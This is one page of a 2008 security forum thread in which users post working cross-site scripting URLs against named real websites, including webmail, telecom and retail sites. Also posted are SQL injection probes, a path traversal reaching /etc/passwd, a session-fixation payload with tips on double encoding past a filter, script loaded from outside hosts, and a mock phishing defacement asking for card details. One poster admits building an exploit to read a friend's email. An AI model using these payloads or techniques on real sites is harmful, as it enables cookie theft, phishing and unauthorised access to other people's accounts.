Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...5354555657585960616263...LastNext
Current Page: 58 of 65
Re: So it begins
Posted by: Anonymous User
Date: September 02, 2008 08:38AM

This is for hurting admins. Don't hurt admins ;) Here's some more fun stuff about them in German.

http://www.cuil.com/search?q=test&m=%22%27%27%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3EIQ%20Test

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: September 02, 2008 04:55PM

cookie stealer for sony station pass anyone?

https://auth.station.sony.com/login?service=%22%3B%3C/script%3E%3Cscript%3Ealert%281%29%3B%3C/script%3Ehttps%3A//account.station.sony.com/j_acegi_cas_security_check%26theme%3DuramWeb%26locale%3Den_US

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: Reiners
Date: September 05, 2008 07:57PM

most popular webmail service in germany: gmx.net
http://suche.gmx.net/search/pic/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.gmx.net/search/web/?su=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://suche.gmx.net/search/dir/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.gmx.net/search/LiveSuche/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://produkte.suche.gmx.net/search.do?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

at least as popular as GMX with same problems: web.de
http://suche.web.de/search/web/?su=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://suche.web.de/search/pic/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/dir/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/news/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://suche.web.de/search/software/?su=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://produkte.suche.web.de/search.do?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E



Edited 2 time(s). Last edit at 09/05/2008 08:18PM by Reiners.

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: September 06, 2008 01:04PM

Oh I wanted to get a friends emails once and developed a gmx.net one, but then i found out that she uses thunderbird and never actually logs in...

I wonder if that one still works, it wasn't the same as yours. let me find it...

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: September 07, 2008 05:27PM

http://f.uck-you.com/%3Fwho%3D%3Ciframe%20src%3Dhttp%3A//google.com%3E
a site i came across, lol

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: September 20, 2008 10:33AM

http://www.wireless.att.com/global-search/search.jsp?q=%22%3E%3Cscript%3Ealert%281%29%3B%3C/script%3E%26x%3D0%26y%3D0%26searchEngine%3Dg

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: peekay
Date: September 20, 2008 01:21PM

These guys make pharmaceuticals and chemicals... like industrial hydrogen peroxide, the kind used in rocket fuel and terrorist bombs.

http://www.solvay.com/services/searchresult/0,,2276-2-0,00.htm?query=%22%3E%3Cscript%3Ealert('owned');%3C/script%3E



Edited 1 time(s). Last edit at 09/20/2008 01:22PM by peekay.

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: September 23, 2008 03:09PM

terrorist chemicals you say?


hxtp://www.solvay.com/services/searchresult/0,,2276-2-0,00.htm?query=%22%3E%3Cstyle%3Efont%20{display:none;}%3C/style%3E%3Cscript%3Edocument.getElementById(%27AutoNumber1%27).innerHTML%20=%20%22%3Ch1%3EToday!%20Big%20terrorist%20chemical%20sale!%3C/h1%3EGrab%20%27em%20while%20the%20government%20is%20unaware!%3Cbr%3EJust%20send%20your%20credit%20card%20information%20to%20notascam@aol.com%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cdiv%20style=display:none%3Ea%22;%3C/script%3E%3Ca%20x=%22



Edited 1 time(s). Last edit at 09/23/2008 03:10PM by Kyo.

Options: ReplyQuote
Re: So it begins
Posted by: PaPPy
Date: September 23, 2008 05:34PM

above doesnt work in IE7, but does in FF3

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: September 27, 2008 02:56PM

http://pbfcomics.com/?cid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: September 28, 2008 09:32AM

http://sex.de/main.php?main=%22%3Cscript%20src=//h4k.in%3E

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: September 29, 2008 01:25PM

what were you doing on that site?!

Options: ReplyQuote
Re: So it begins
Posted by: thrill
Date: September 29, 2008 01:36PM

He was reading the articles.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 29, 2008 04:23PM

Was genau ist Oroanalkontakt?

-id

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: September 29, 2008 05:30PM

@id: you definitely do not wanna know

@thrill: research for my homework

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: October 15, 2008 02:50AM

http://www.123people.com/s/HASH(0x%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E537e740)/United+States

Dunno if we had that one already...

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: October 15, 2008 10:14AM

Thi's is something weird..

hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all

Tested on FF 3.0.3 (UTF-8)

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: DoctorDan
Date: October 15, 2008 07:51PM

Wow, cicatriz! Unexpected and interesting find!

Options: ReplyQuote
Re: So it begins
Posted by: DoctorDan
Date: October 15, 2008 07:53PM

Wow, cicatriz! Unexpected and interesting find!
This may be of some help in explanation: http://wikisecure.net/articles/uri-encoding-to-bypass-idsips/

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: October 16, 2008 12:19PM

http://my.att.net/s/s.dll?num=10&spage=search/resultshome1.htm&searchType=web&string=att&where=*/%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3B/*&sm.x=0&sm.y=0&sm=Go

EDIT: AT&T makes phishing easy: https://uversecentral1.att.com/uvp/home/explore?umaurl=:a@google.com%3F

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/16/2008 12:44PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: October 17, 2008 07:40AM

Thanks DoctorDan!
I'll read it. I've found this also:

http://applesoup.googlepages.com/bypass_filter.txt

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Options: ReplyQuote
Re: So it begins
Posted by: iNs4n3
Date: October 21, 2008 11:54PM

this is probably my favourite:

http://ha.ckers.org_xss.js.sapo.pt that translates to... http://pesquisa.sapo.pt/?q=ha+ckers+org+xss+js

:P



Edited 1 time(s). Last edit at 10/21/2008 11:58PM by iNs4n3.

Options: ReplyQuote
Re: So it begins
Posted by: euronymous
Date: October 22, 2008 12:47PM

Hi guys

I'm finally ready to post some vulnerabilities that I've found lazily browsing the web, for fun/profit.

Enjoy them.

-- Italian Hosting --
http://www.hosty.it/index.jsp?sezione=registrazione_dominio_step1&dominio=%3CScripT%3Ealert%286%29%3C%2FScripT%3E&estensione=.it&opzione=REG_DOM [reflected XSS]

--- Goa/Trance world known service ---
http://217.160.136.176/cgi-bin/search.cgi [reflected XSS in the search bar]

-- Deputati DS, politic web site (anyway I'm with them, not with berlusconi)
http://www.deputatids.it [reflected XSS in search bar]
http://www.deputatids.it/Select.asp?Section=Deputato&ID=%27 [sql injection]

-- Supermicro--
http://www.supermicro.com/wheretobuy/europe.cfm?rgn=115&cmp=%27 [actually they putted some WAF, anyway the vulnerability was exploitable some weeks ago]

-- Atlantis, italian router manufacturer
http://www.atlantis-land.com/ita/prodotti.php?l1=%27&l2=%27 [weird error]

--Mps Italia, mobile phone services
http://www.mpsitalia.com/index.php?notizia=3 [confirmed sql injection in the "notizie" parameter]

-- Toshiba
http://aps2.toshiba-tro.de/wlan/?page=../../../../etc/passwd [include bug, need to be refined :)]

+++eat, fuck, hack+++

Options: ReplyQuote
Re: So it begins
Posted by: C1c4Tr1Z
Date: October 22, 2008 04:21PM

And, Kodak:

http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22

http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss

@euronymous:

http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]



Edited 1 time(s). Last edit at 10/22/2008 04:25PM by C1c4Tr1Z.

Options: ReplyQuote
Re: So it begins
Posted by: luckymurari
Date: October 25, 2008 02:36AM

@eurodynams


http://aps2.toshiba-tro.de/wlan/?page=../index An infinite loop.May break your browser:)

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: October 29, 2008 10:22AM


Options: ReplyQuote
Re: So it begins
Posted by: lightos
Date: October 30, 2008 04:00AM

I found this one some time ago http://www.zorpia.com/email/optout/<BODY%20ONLOAD=alert(document.cookie)%3E

Almost managed to create a fixed session with http://zorpia.com/email/optout/%3CMETA%20HTTP-EQUIV=%22Set-Cookie%22%20Content=%22zorpia_session=abc%3Bpath=%2F%3Bexpires=0%22%3E .. only thing holding me back is setting the path to '/'
The filter replaces / for </b>. Would anyone know a way around this?

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: October 30, 2008 08:55AM

try double encoding - and don#t forget to set the domain right :)

%22Set-Cookie%22%20Content=%22zorpia_session=abcdefg%3Bpath=%252F%3Bdomain=.zorpia.com%3Bexpires=0%22%3E

Options: ReplyQuote
Re: So it begins
Posted by: lightos
Date: October 30, 2008 04:53PM

Thanks Mario, very much appreciated!

Here's something to laugh/cry about.
This site claims to be "100% secure". It also has a "Verified Secure Certification Seal" which seems to be pretty useless, check it out.

XSS:
http://www.rockler.com/search_results.cfm?filter=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E

Also generates weak session IDs:
55851486
55851489
55851496
55851497


The rockler.com Verified Secure Certification seal has been validated and is authentic. The Verified Secure scanning system actively searches this website for thousands of known vulnerabilities defined by the Payment Card Industry Data Security Standards scanning guidelines. You can shop in confidence knowing that rockler.com is taking precautions to help keep your personal information secure.

PCI DSS scanning guidelines that can't detect a simple XSS?

Just comes to show how insecure things really are.

Options: ReplyQuote
Re: So it begins
Posted by: Kyo
Date: November 01, 2008 03:49AM

Yeah, most of these scans don't check for XSS

Options: ReplyQuote
Pages: PreviousFirst...5354555657585960616263...LastNext
Current Page: 58 of 65


Sorry, only registered users may post in this forum.